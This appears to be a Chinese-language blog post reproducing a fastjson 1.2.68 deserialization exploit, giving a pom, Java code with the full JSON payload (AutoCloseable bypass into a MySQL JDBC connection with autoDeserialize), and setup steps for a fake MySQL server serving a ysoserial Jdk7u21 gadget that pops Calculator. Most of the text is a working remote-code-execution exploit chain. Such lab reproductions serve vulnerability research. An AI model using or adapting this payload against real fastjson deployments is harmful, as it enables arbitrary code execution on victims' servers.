fastjson 1.2.68利用
阿新 • • 發佈:2021-11-08
一 環境
mac M1
java version "1.7.0_21"
jdk下載地址 https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html
二 pom
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>org.example</groupId> <artifactId>java7_fastjson</artifactId> <version>1.0-SNAPSHOT</version> <properties> <maven.compiler.source>7</maven.compiler.source> <maven.compiler.target>7</maven.compiler.target> </properties> <dependencies> <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.68</version> </dependency> <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java</artifactId> <version>5.1.29</version> </dependency> </dependencies> </project>
三 java 程式碼
import com.alibaba.fastjson.JSON; public class main { public static void main(String[] args){ String string = "{\"@type\":\"java.lang.AutoCloseable\"{\"@type\":\"com.mysql.jdbc.JDBC4Connection\",\"hostToConnectTo\":\"127.0.0.1\",\"portToConnectTo\":3307,\"info\":{\"user\":\"yso_Jdk7u21_calc\",\"password\":\"oihnqwa\",\"statementInterceptors\":\"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\"autoDeserialize\":\"true\"},\"databaseToConnectTo\":\"test\",\"url\":\"\"}"; Object obj = JSON.parseObject(string); System.out.println(obj.toString()); } }
四 MySQL Fake Server
https://github.com/fnmsd/MySQL_Fake_Server
1 config.json 中 修改java路徑
"javaBinPath":"/Library/Java/JavaVirtualMachines/jdk1.7.0_21.jdk/Contents/Home/bin/java",
2 放入一個ysoserial jar包
3 server.py中,強制修改掉命令
yso_command = "open /System/Applications/Calculator.app"
elif username.startswith(b"yso_"): query =(yield from packet.read()) _,yso_type,yso_command = username.decode('ascii').split("_") yso_command = "open /System/Applications/Calculator.app"
五 執行
執行java程式碼,成功彈出
六 問題
1 不管成功不成功,都會有 "Could not map transaction isolation '11 to a valid JDBC level."這個報錯
2 在jdk1.8的版本下,怎麼利用